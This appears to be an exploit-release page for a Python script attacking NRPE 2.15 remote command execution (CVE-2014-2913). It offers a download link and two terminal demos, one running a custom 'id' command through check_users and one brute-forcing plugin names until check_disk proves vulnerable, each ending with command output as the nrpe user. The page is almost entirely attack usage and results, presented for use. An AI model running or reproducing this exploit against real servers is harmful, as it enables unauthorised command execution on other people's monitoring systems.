NRPE 2.15 Remote Command Execution python Exploit – CVE-2014-2913
Download Exploit: HERE
Custom Command Mode:
claudio@backbox3:~/Desktop$ ./nrpe_215_rce_exploit.py -H 10.0.0.70 --cmd="id" -c check_users
$$\ $$\ $$$$$$$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$\ $$$$$$$\
$$$\ $$ |$$ __$$\ $$ __$$\ $$ _____| $$ __$$\ $$$$ | $$ ____|
$$$$\ $$ |$$ | $$ |$$ | $$ |$$ | \__/ $$ | \_$$ | $$ |
$$ $$\$$ |$$$$$$$ |$$$$$$$ |$$$$$\ $$$$$$ | $$ | $$$$$$$\
$$ \$$$$ |$$ __$$< $$ ____/ $$ __| $$ ____/ $$ | \_____$$\
$$ |\$$$ |$$ | $$ |$$ | $$ | $$ | $$ | $$\ $$ |
$$ | \$$ |$$ | $$ |$$ | $$$$$$$$\ $$$$$$$$\ $$\ $$$$$$\$$$$$$ |
\__| \__|\__| \__|\__| \________| \________|\__|\______|\______/
$$$$$$$\ $$$$$$\ $$$$$$$$\
$$ __$$\ $$ __$$\ $$ _____|
$$ | $$ |$$ / \__|$$ |
$$$$$$$ |$$ | $$$$$\
$$ __$$< $$ | $$ __|
$$ | $$ |$$ | $$\ $$ |
$$ | $$ |\$$$$$$ |$$$$$$$$\
\__| \__| \______/ \________|
NRPE <= 2.15 R3m0t3 C0mm4nd Ex3cut10n
=============================================
- Release date: 17.04.2014
- Discovered by: Dawid Golunski
- Severity: High
- CVE: 2014-2913
=============================================
Written by:
Claudio Viviani
http://www.homelab.it
[email protected]
[email protected]
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
[+] Target: 10.0.0.70
[+] Command: id
[+] Custom command Mode....
[+]
[+] Connecting......
[+] Checking for NRPE command check_users: VULNERABLE!
[+]
[+] Max Output CHAR 1024 (According to NRPE <= 2.15 specifications)
[+]
[+] Please ignore NRPE plugin command messages (Usage or Errors)
[+]
Usage:
check_users -w <users> -c <users>
uid=496(nrpe) gid=497(nagios) gruppi=496(nrpe),497(nagios)
Brute Force Mode:
claudio@backbox3:~/Desktop$ ./nrpe_215_rce_exploit.py -H 10.0.0.70 --cmd="id" -b
$$\ $$\ $$$$$$$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$\ $$$$$$$\
$$$\ $$ |$$ __$$\ $$ __$$\ $$ _____| $$ __$$\ $$$$ | $$ ____|
$$$$\ $$ |$$ | $$ |$$ | $$ |$$ | \__/ $$ | \_$$ | $$ |
$$ $$\$$ |$$$$$$$ |$$$$$$$ |$$$$$\ $$$$$$ | $$ | $$$$$$$\
$$ \$$$$ |$$ __$$< $$ ____/ $$ __| $$ ____/ $$ | \_____$$\
$$ |\$$$ |$$ | $$ |$$ | $$ | $$ | $$ | $$\ $$ |
$$ | \$$ |$$ | $$ |$$ | $$$$$$$$\ $$$$$$$$\ $$\ $$$$$$\$$$$$$ |
\__| \__|\__| \__|\__| \________| \________|\__|\______|\______/
$$$$$$$\ $$$$$$\ $$$$$$$$\
$$ __$$\ $$ __$$\ $$ _____|
$$ | $$ |$$ / \__|$$ |
$$$$$$$ |$$ | $$$$$\
$$ __$$< $$ | $$ __|
$$ | $$ |$$ | $$\ $$ |
$$ | $$ |\$$$$$$ |$$$$$$$$\
\__| \__| \______/ \________|
NRPE <= 2.15 R3m0t3 C0mm4nd Ex3cut10n
=============================================
- Release date: 17.04.2014
- Discovered by: Dawid Golunski
- Severity: High
- CVE: 2014-2913
=============================================
Written by:
Claudio Viviani
http://www.homelab.it
[email protected]
[email protected]
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
[+] Target: 10.0.0.70
[+] Command: id
[+] Brute force Mode....
[+]
[-] Checking for NRPE command check_all: not found
[-] Checking for NRPE command check_apt: not found
[-] Checking for NRPE command check_bdii: not found
[-] Checking for NRPE command check_bonding: not found
[-] Checking for NRPE command check_breeze: not found
[-] Checking for NRPE command check_by_ssh: not found
[-] Checking for NRPE command check_check-updates: not found
[-] Checking for NRPE command check_check_sip: not found
[-] Checking for NRPE command check_cluster: not found
[-] Checking for NRPE command check_dhcp: not found
[-] Checking for NRPE command check_dig: not found
[+] Checking for NRPE command check_disk: VULNERABLE!
[+]
[+] Max Output CHAR 1024 (According to NRPE <= 2.15 specifications)
[+]
[+] Please ignore NRPE plugin command messages (Usage or Errors)
[+]
Unknown argument
Usage:
check_disk -w limit -c limit [-W limit] [-K limit] {-p path | -x device}
[-C] [-E] [-e] [-g group ] [-k] [-l] [-M] [-m] [-R path ] [-r path ]
[-t timeout] [-u unit] [-v] [-X type]
uid=496(nrpe) gid=497(nagios) gruppi=496(nrpe),497(nagios)